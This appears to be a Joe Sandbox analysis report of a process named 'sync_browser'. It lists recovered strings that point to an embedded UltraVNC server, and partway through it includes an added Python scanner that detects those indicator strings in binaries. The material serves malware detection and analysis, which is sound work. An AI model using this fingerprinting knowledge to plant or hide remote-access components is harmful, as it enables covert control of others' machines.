                                                                    • Instruction ID: 47ed17a3d0ee090da14c529209d9d1a011d9ae601de35723856c98a12cd2ddee
                                                                    • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                    • Instruction Fuzzy Hash: BF219332B1877599E711CF61AC509AD76A9BF0CBA8B590137FE5C93B88CE38D412C340
                                                                    APIs
                                                                    Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CurrentDirectoryFileModuleName
• String ID: " -service
• API String ID: 3981628254-877726483
• Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
• Instruction ID: b5fc09df4f56688e69f82ba7b92ddb45e43795d0fe6994040f4d03586071f666
• Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
• Instruction Fuzzy Hash: 8C319C21A08AC581E7218B20AC553BE37A4FFC8354F848333DAAD836D5DE2CE126CB10
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _errno_invalid_parameter_noinfo
• String ID: B
• API String ID: 2959964966-1255198513
• Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
• Instruction ID: c044c60309643075d42fd2dd042e622a9e828cc1874e4a479ca520d11280d819
• Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
• Instruction Fuzzy Hash: 00119032A1876586E7209B15E84026DB6A4FB88B94F584332EB8D97BC5CE3CD552DB04
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: FileModuleNamePlaySound
• String ID: ding_dong.wav
• API String ID: 3032721342-215479118
• Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
• Instruction ID: bc23d4635a1c93750babe3e8762031b4e3ff7bd080e8a41b04237dcd51172b6b
• Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
• Instruction Fuzzy Hash: B8115121B08A5981E7249B35F95136E62A4FB88760F404337EA7CC76D4DF3CD126CB00
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Item$MessageSend_errno_invalid_parameter_noinfo
• String ID: <
• API String ID: 2439412506-4251816714
• Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
• Instruction ID: 518ed335f7a3951b217b55277b2c87ecc738194abacd585bc66f9b87a7707769
• Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
• Instruction Fuzzy Hash: BD118F32A18A5586E7509F12F8107AEB364FBC8B44F545132EB8D47B55CF3CD916CB40
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _errno_invalid_parameter_noinfo
• String ID: I
• API String ID: 2959964966-3707901625
• Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
• Instruction ID: cd59edaaaf022f1468b0ad10ba6f03b6fd33250630bc3d9390d83143573da2c5
• Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
• Instruction Fuzzy Hash: 33119E72A08B5485EB109B12E94026DB6A8FB98FE0F184232EA9D57BD5CE3CD512CB00
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: getpeernameinet_ntoa
• String ID: <unavailable>
• API String ID: 1982201544-1096956887
• Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
• Instruction ID: f7eb2ca595912cf3c38fa1a777bb882bd17b3b626b3246b45c1ea0c9290e4d88
• Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
• Instruction Fuzzy Hash: 610180B2A0964982EF509B10E89536D73A4FB88B89F444032EA4E8B764DF3CD566CB00
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: File$MappingOpenView
• String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
• API String ID: 3439327939-3305976270
• Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
• Instruction ID: cc0d7c9676197fdf2af3e1bde5c22f2155c79256f30d1373609cf7bd07992d12
• Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
• Instruction Fuzzy Hash: 29018E32509B94C6E720CB65F44176EB3A4FB84B64F484236D6AA42B94CF7CD462C790
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: File$MappingOpenView
• String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
• API String ID: 3439327939-2897898322
• Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
• Instruction ID: 03d722647af874695cba954238835cb2b71ab9b5aa5df9bd538109719f99b59a
• Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
• Instruction Fuzzy Hash: 8C018E32508B9486E720CBA5E40076EB3A4FB88B64F450336DAAA43B94CF7CD062C750
APIs
Strings
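The function entries above recover a handful of strings from the process 0x12 image that, taken together, fingerprint an UltraVNC server build: the `" -service` command-line fragment built from GetModuleFileName/GetCurrentDirectory (service self-install), the SecureVNC plugin handshake format string, the bundled ding_dong.wav notification sound, the `<unavailable>` placeholder written when getpeername/inet_ntoa fail, and the two GUID-named file mappings opened through OpenFileMapping/MapViewOfFile. The scanner below is an added example, not Joe Sandbox, UltraVNC or the sample's own code: it searches a blob for those strings in both ASCII and UTF-16LE (the W-variant APIs take wide strings) and scores the distinct hits. The weights, the verdict threshold and the sample blobs are assumptions; only the indicator strings themselves come from the report. DllGetVersion is listed in the report too but is a generic shell32/comctl32 version probe, so it is deliberately left out.

```python
"""
Indicator-string scanner for the UltraVNC artefacts listed in the report.
Added example, not code from Joe Sandbox, UltraVNC or the analysed sample.
"""
import re

# Indicator strings as they appear in the Similarity entries of the report.
# The weight attached to each one is an assumption about how specific it is.
INDICATORS = {
    # tail of the self-install command line: "<path>" -service
    b'" -service': ("service_install_cmdline", 3),
    # SecureVNC encryption plugin handshake format string
    b"SecureVNC;0;0x%08x;%s": ("securevnc_plugin", 4),
    # notification sound file shipped with UltraVNC
    b"ding_dong.wav": ("ultravnc_sound", 3),
    # placeholder logged when getpeername()/inet_ntoa() fail (low signal)
    b"<unavailable>": ("peer_addr_placeholder", 1),
    # GUID-named file mappings opened via OpenFileMapping/MapViewOfFile
    b"{34F673E0-878F-11D5-B98A-00B0D07B8C7C}": ("filemapping_guid_a", 4),
    b"{34F673E0-878F-11D5-B98A-57B0D07B8C7C}": ("filemapping_guid_b", 4),
}


def _encodings(s: bytes):
    """Yield the ASCII form and the UTF-16LE form (used by Windows W-APIs)."""
    yield "ascii", s
    yield "utf16le", s.decode("latin-1").encode("utf-16-le")


def scan(data: bytes) -> dict:
    """Return {indicator_name: [(encoding, offset), ...]} for every hit in data."""
    hits = {}
    for raw, (name, _weight) in INDICATORS.items():
        for enc, needle in _encodings(raw):
            for m in re.finditer(re.escape(needle), data):
                hits.setdefault(name, []).append((enc, m.start()))
    return hits


def score(hits: dict) -> int:
    """Sum the weight of each distinct indicator present; repeats count once."""
    weights = {name: w for _raw, (name, w) in INDICATORS.items()}
    return sum(weights[name] for name in hits)


def classify(data: bytes, threshold: int = 6) -> tuple:
    """Return (verdict, score, hits). The threshold is an assumed tuning value."""
    hits = scan(data)
    total = score(hits)
    verdict = "ultravnc_server" if total >= threshold else "no_match"
    return verdict, total, hits


# Constructed sample blobs (not real file content) to exercise the scanner.
SAMPLE_VNC = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b'" -service\x00'
    + b"ding_dong.wav\x00"
    + "{34F673E0-878F-11D5-B98A-00B0D07B8C7C}".encode("utf-16-le")
    + b"\x00" * 8
    + b"DllGetVersion\x00"
)
SAMPLE_BENIGN = b"MZ\x90\x00" + b"DllGetVersion\x00" + b"<unavailable>\x00"

if __name__ == "__main__":
    for label, blob in (("vnc", SAMPLE_VNC), ("benign", SAMPLE_BENIGN)):
        verdict, total, hits = classify(blob)
        print(label, verdict, total, sorted(hits))
```

Run it against a dumped image or an on-disk PE by reading the file into `classify()`; the per-indicator offsets let you jump straight to the referencing function in a disassembler, and the `encoding` tag tells you whether the string feeds an A- or W-suffixed API.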
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: AddressFreeLibraryProc
• String ID: DllGetVersion
• API String ID: 3013587201-2861820592
• Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
• Instruction ID: 772f17e1881d52dcf8452bae2101ade4aa23bb9727a9bba963607bfe6393a22b
• Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
• Instruction Fuzzy Hash: E5018431A0C75582E7248F55F88003EB3A4FB88794F44413AFA9E82758DF3CD166CB10
APIs
Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ClassMessageNamePost
                                                                    • String ID: WindowsScreenSaverClass
                                                                    • API String ID: 650004062-352026012
                                                                    • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                    • Instruction ID: 6803f9be65b9b21848447a152a62d8280a343175a3ff2c1bf7a2bbfb94ebd555
                                                                    • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                    • Instruction Fuzzy Hash: F7012C35A18A9981E7718B11F8147EA6394FB8CB84F400132DA8C87B58DE3CE1668B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateErrorFileLastMapping
                                                                    • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                    • API String ID: 1790465270-3305976270
                                                                    • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                    • Instruction ID: e53b0e4604c99687e7cb9be4f041bc9da4af2b094e45a66c7e4fa6f9655f3468
                                                                    • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                    • Instruction Fuzzy Hash: CA018F32508BC582E7618B25A44036AB7A0E744374F548335E6BE826E8DF7CC4A6CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageObjectSendSingleWait
                                                                    • String ID: vncclient.cpp : client Kill() called
                                                                    • API String ID: 353115698-1198714380
                                                                    • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                    • Instruction ID: d43f62fa1bd8ff448425a6817bd0194316c5f83ff9b2fd6752b6f88339f52923
                                                                    • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                    • Instruction Fuzzy Hash: 4601DF32604A8681FB589F25E8557AD2369EF84B74F084332CA3C866D4CF38D4A6C380
                                                                    APIs
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF6DC0C678B
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpen
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                    • API String ID: 47109696-713323490
                                                                    • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                    • Instruction ID: 1db7ff65ad4c469827fced6f061d7c20895422d16c5e9682ce4c9195f300392d
                                                                    • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                    • Instruction Fuzzy Hash: E7F09622A1868581EF208B25E40436EB3B4FF95B98F640136DA9C877A4DF7ED0A6C705
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
